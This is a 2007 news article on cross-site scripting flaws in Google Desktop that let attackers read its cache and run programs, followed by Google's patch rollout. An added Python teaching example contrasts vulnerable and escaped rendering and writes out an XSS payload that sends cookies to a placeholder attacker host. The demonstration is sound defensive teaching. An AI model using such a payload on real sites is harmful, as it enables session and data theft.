Critical Vulnerability Caught In Google Desktop

Google is pushing out a fix to users through its auto updating system, but security pros recommend users manually update their systems.

February 21, 2007


A security company is advising people who use Google Desktop to immediately download the latest version to protect their computers from a critical vulnerability.

Danny Allan, director of security research at Watchfire, a security and analysis company, says researchers found a vulnerability in Google Desktop that puts users' private information at risk and enables remote attackers to run programs on the infected machines. Allan says they reported the vulnerability to Google on Jan. 4, and the online search leader created a fix for it on Feb. 1.

Allan notes that while Google says it can automatically update its software and take care of the vulnerability, he has had to manually update his three home computers. "The fix is in their latest version," he says. "My software did not [automatically] patch. We had some issues with the updating mechanism. It didn't work at all. We had to install it manually."

Barry Schnitt, a Google spokesman, says the company started pushing out auto updates a few weeks ago and is still in the process of getting to its millions of users. He also says the auto update will work in the "vast majority" of cases. "A fix was developed quickly, and users are being automatically updated with the patch. In addition, we have [added] another layer of security checks to the latest version of Google Desktop to protect users from similar vulnerabilities in the future," Schnitt says.

Google hasn't received any reports of the vulnerability being exploited, Schnitt says. "However, users should make sure they are running the latest version of Google Desktop by going to http://desktop.google.com and downloading the latest version and installing it," he adds.

Watchfire's Allan says there actually are three separate flaws wrapped up in this vulnerability. All three are cross-site scripting (XSS) issues, which allow remote attackers to inject JavaScript into a Web application such as Google Desktop. Allan says about 80% of Web applications are vulnerable to varying degrees to cross-site scripting, but the Google Desktop vulnerability "constitutes the most serious outcome that I have seen."

Google Desktop has the ability to cache and remember all of a user's private and corporate information. It basically is a mini agent that lives on the desktop computer and crawls through e-mail, zip files, office documents, and Web sites visited. It indexes all of the information and stores it within its cache.

This vulnerability allows a remote attacker to access this cache and all the information in it, explains Allan.

The attack begins when the user clicks a link in an e-mail or visits a malicious Web site. The page behind that link, according to Allan, injects the malicious script into the Google Desktop Web application on the computer.
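The two passages above describe the mechanism in the abstract: a script-injection flaw in the Web application, delivered by a link the victim follows. The following is an added example, not code from the article, from Watchfire or from Google, showing that pattern on a minimal search-results page of the kind a locally served desktop-search tool might render. Everything in it is constructed for illustration: the page template, the index entries, the attacker link and the payload are assumptions, and the search path and host name are hypothetical. The vulnerable renderer reflects the q= parameter into the page verbatim; the hardened renderer HTML-escapes every untrusted string first.

```python
import html
from urllib.parse import urlsplit, parse_qs, quote

# Constructed page template for a hypothetical local desktop-search web app
# (not Google Desktop's actual markup).
PAGE_TEMPLATE = (
    "<html><body>"
    "<h1>Results for: {query}</h1>"
    "<ul>{items}</ul>"
    "</body></html>"
)

# Constructed index entries standing in for cached documents and mail.
INDEX = {
    "budget": ["budget-2007.xls", "mail: Q1 budget review"],
    "resume": ["resume.doc"],
}


def search(query):
    """Case-insensitive lookup over the constructed index."""
    return INDEX.get(query.strip().lower(), [])


def render_results_vulnerable(query):
    """Reflects the query (and indexed titles) into the page verbatim.
    Any markup in the query becomes live HTML: reflected XSS."""
    items = "".join(f"<li>{hit}</li>" for hit in search(query))
    return PAGE_TEMPLATE.format(query=query, items=items)


def render_results_hardened(query):
    """Same page, but every untrusted string is HTML-escaped before it
    reaches the markup, so a script tag is shown as text, not executed."""
    items = "".join(f"<li>{html.escape(hit)}</li>" for hit in search(query))
    return PAGE_TEMPLATE.format(query=html.escape(query, quote=True), items=items)


def query_from_link(url):
    """Extract the q= parameter from a link an attacker might mail to the
    victim; a real app would receive this as the request's query string."""
    params = parse_qs(urlsplit(url).query)
    return params.get("q", [""])[0]


def script_is_live(page, payload):
    """True if the payload appears in the page byte-for-byte, i.e. unescaped
    and therefore executable by the browser."""
    return payload in page


# Constructed attacker payload and link. If reflected unescaped, the script
# runs in the origin of the desktop-search page; attacker.example is a
# placeholder host.
PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
ATTACKER_LINK = "http://localhost/search?q=" + quote(PAYLOAD)

if __name__ == "__main__":
    q = query_from_link(ATTACKER_LINK)
    print("vulnerable page executes payload:", script_is_live(render_results_vulnerable(q), PAYLOAD))
    print("hardened page executes payload:  ", script_is_live(render_results_hardened(q), PAYLOAD))
```

The hardened version escapes for an HTML text context only; a value placed inside an attribute, a URL or a script block needs the encoding appropriate to that context, which is why "escape everything once" is not a complete fix for the class of flaw the article describes.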

Once a computer is compromised, the attacker can search for information on it and download it to his own system, control how the Web application functions, and run programs remotely on the computer. Allan notes that the first two outcomes are serious but calls the remote program execution a critical issue.
